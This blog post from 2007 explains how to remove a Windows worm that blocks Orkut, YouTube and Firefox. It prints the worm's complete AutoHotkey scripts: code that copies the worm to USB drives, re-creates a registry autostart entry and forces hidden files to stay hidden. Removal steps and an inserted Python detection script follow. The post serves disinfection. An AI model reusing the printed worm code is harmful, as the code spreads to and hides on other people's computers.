Friday, June 1, 2007

Can't Login in Orkut or Youtube

Hi friends. I have heard this problem many times from my friends. They say: "I can't access Orkut on my system. After typing the URL, the browser gets closed and a dialog box appears with the message "Orkut is banned you fool,The administrators didnt write this programe guess who did?? MUHAHAHA!!", along with a laughing sound."
What is this, and how can we remove this virus or worm?

So here is the full description of this malware.

About this malware:
This is a new malware (and a funny one; I think some activist programmed it) which blocks the user from accessing YouTube or Orkut.
It shows the alert "orkut\youtube is banned you fool" and closes the window immediately.
It also blocks the user from opening Firefox: it shows the alert "use IE you dope" and closes the Firefox window.
It also plays a .wav file (which sounds like "muhahaha!!") whenever the alerts pop up.

How to Remove:
First download HijackThis from Trend Micro and run it. It will display the processes and startup entries on your system; look for entries like these:
1. heap41a\svchost.exe
2. heap41a\std.txt
Delete these entries. If you delete the other svchost.exe entries instead, you will only get a Windows warning and your system will restart.
After that, use Search to search for "heap", ticking the option to include hidden and system folders; you will then see a hidden folder named heap41a. Delete it. If you get "access denied", download, install and use Unlocker.

Where this malware comes from:
1] From unwanted sites and your removable disk.
2] The malware copies itself onto your flash drive when the drive is plugged into an infected system, and hides itself there disguised as a folder.

I have PE Tools installed on my PC, so I ran it to look at the running processes. I went through all of them and found that svchost.exe was the one responsible. Where PE Tools helped me was that this svchost.exe was running from the location C:\heap41a. So this is where the worm resides; interesting, so deleting the folder should do the job. But it was not so easy: when I terminated svchost.exe from the process list, it started again. So I had to boot my XP in safe mode. Why safe mode? Because in safe mode Windows loads only the minimum required drivers and doesn't start any user processes, which means the worm is not started with Windows.

Now I looked for the folder C:\heap41a, but it was hidden. I went to Tools > Folder Options, selected "Show hidden files and folders" and pressed OK. I refreshed C:\ only to find that it still would not show any hidden folders. I went back to Tools > Folder Options and found that the "Show hidden files and folders" setting had been reset. So how do I see the contents? What I did was open Windows Search, tick "Search hidden files and folders" under the advanced options, and search for svchost.exe. It found it, so I opened the folder, and this file was not alone. The other files in the folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt and std.txt. Let's look at the contents of these text files.

[offspring] - Blank Folder

2.mp3 - A laughing sound

Icon.ico - A blank Icon file

reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
; persistence: every 5 seconds, re-create the policies\Explorer\Run entry if it was removed
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return



svchost.exe

This is the culprit: the file responsible for all the annoying pop-ups. The .txt files are written in AutoHotkey syntax, and std.txt launches this svchost.exe with a script path as its only argument, which is how an AutoHotkey interpreter is run; so the scripts are what actually do the work, and svchost.exe is merely the engine that executes them.

script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return


std.txt


#notrayicon
#singleinstance,ignore
; keep the "Show hidden files and folders" option from sticking (CheckedValue 2 = Do not show)
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
; launch the window-closing script and the USB-spreading script
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt



These files give away everything this worm does; after reading the scripts I found out that this worm also hates YouTube. The most important information they gave was the registry keys it modifies.

These are the lines responsible for the hidden-folder problem I faced earlier:

regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2


Now to rectify this, go to Start Menu > Run and type regedit. In the Registry Editor browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and reset the "CheckedValue" entry from 2 back to 1. Now you can change the setting in Folder Options again. Then delete the folder C:\heap41a and clear every value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run that mentions heap41a.
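The two registry changes above (the SHOWALL CheckedValue forced to 2, and the winlogon value under policies\Explorer\Run) are also the entries the How to Remove section asks you to look for in HijackThis. As an added example that is not part of the original post, the Python script below performs that check offline against a registry export (the text that `reg export` produces) and writes a .reg fragment that reverses both changes. The sample export embedded in it is constructed to resemble an infected XP machine, and the `heap41a` folder name is taken from the post; the file path, function names and the UTF-16 handling are my own assumptions.

```python
r"""Offline check for the heap41a registry changes described in the post.

Added example, not code from the original post. It parses a registry export
(e.g. `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion out.reg`)
and flags the two indicators the worm's scripts reveal:
  1. SHOWALL\CheckedValue set to 2, which stops "Show hidden files" from sticking
  2. a value under policies\Explorer\Run that launches something from C:\heap41a
It then builds a .reg fragment that reverses both.
"""

SHOWALL_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
               r"\Explorer\Advanced\Folder\Hidden\SHOWALL")
POLICY_RUN_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
                  r"\policies\Explorer\Run")
WORM_DIR = "heap41a"  # folder name the post reports the worm living in

# Constructed sample export (not from a real machine): an infected XP box would
# look roughly like this. Note the mixed case in "Policies"; the registry is
# case-insensitive, so the matching below is too.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000002
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"winlogon"="C:\\heap41a\\svchost.exe C:\\heap41a\\std.txt"
"""


def parse_reg(text):
    """Parse .reg text into {key_path: {value_name: value}}.
    REG_SZ strings are unescaped, dword values become ints; any other
    value type (hex:, hex(2):, ...) is kept as its raw text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            value = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        elif data.lower().startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data
        keys[current][name] = value
    return keys


def _get_key(keys, wanted):
    """Case-insensitive key lookup, as the registry itself resolves names."""
    for path, values in keys.items():
        if path.lower() == wanted.lower():
            return values
    return {}


def find_indicators(keys):
    """Return (indicator, detail) pairs for the two tampering signs."""
    findings = []
    showall = {n.lower(): v for n, v in _get_key(keys, SHOWALL_KEY).items()}
    checked = showall.get("checkedvalue")
    if checked is not None and checked != 1:
        findings.append(("showall_checkedvalue_tampered", f"CheckedValue={checked}, expected 1"))
    for name, value in _get_key(keys, POLICY_RUN_KEY).items():
        if isinstance(value, str) and WORM_DIR in value.lower():
            findings.append(("policy_run_worm_entry", f"{name} -> {value}"))
    return findings


def remediation_reg(findings):
    r"""Build a .reg fragment that undoes the findings: CheckedValue back to 1
    and each flagged Run value deleted ("name"=- is regedit's delete syntax).
    It does not touch C:\heap41a itself; delete that folder separately."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    if any(kind == "showall_checkedvalue_tampered" for kind, _ in findings):
        lines += [f"[{SHOWALL_KEY}]", '"CheckedValue"=dword:00000001', ""]
    names = [detail.split(" -> ", 1)[0] for kind, detail in findings
             if kind == "policy_run_worm_entry"]
    if names:
        lines += [f"[{POLICY_RUN_KEY}]"] + [f'"{n}"=-' for n in names] + [""]
    return "\n".join(lines)


def check_file(path):
    """Read a real export (reg export on XP writes UTF-16) and return findings."""
    try:
        with open(path, encoding="utf-16") as fh:
            text = fh.read()
    except UnicodeError:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    return find_indicators(parse_reg(text))


if __name__ == "__main__":
    import sys
    found = check_file(sys.argv[1]) if len(sys.argv) > 1 else find_indicators(parse_reg(SAMPLE_REG))
    for kind, detail in found:
        print(f"{kind}: {detail}")
    if found:
        print(remediation_reg(found))
```

Run it with no argument to see it flag the constructed sample, or pass the path of a real export. The generated fragment only resets the folder-option value and deletes the Run entries it flagged; review it before importing, and remember that while the worm is still running it re-creates the Run entry every five seconds, so the registry fix only holds after the process is stopped (safe mode, as in the post) and C:\heap41a is removed.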

Now the virus infection is removed 100%. Before you are done, make sure you format the USB drive so it doesn't infect other systems too.
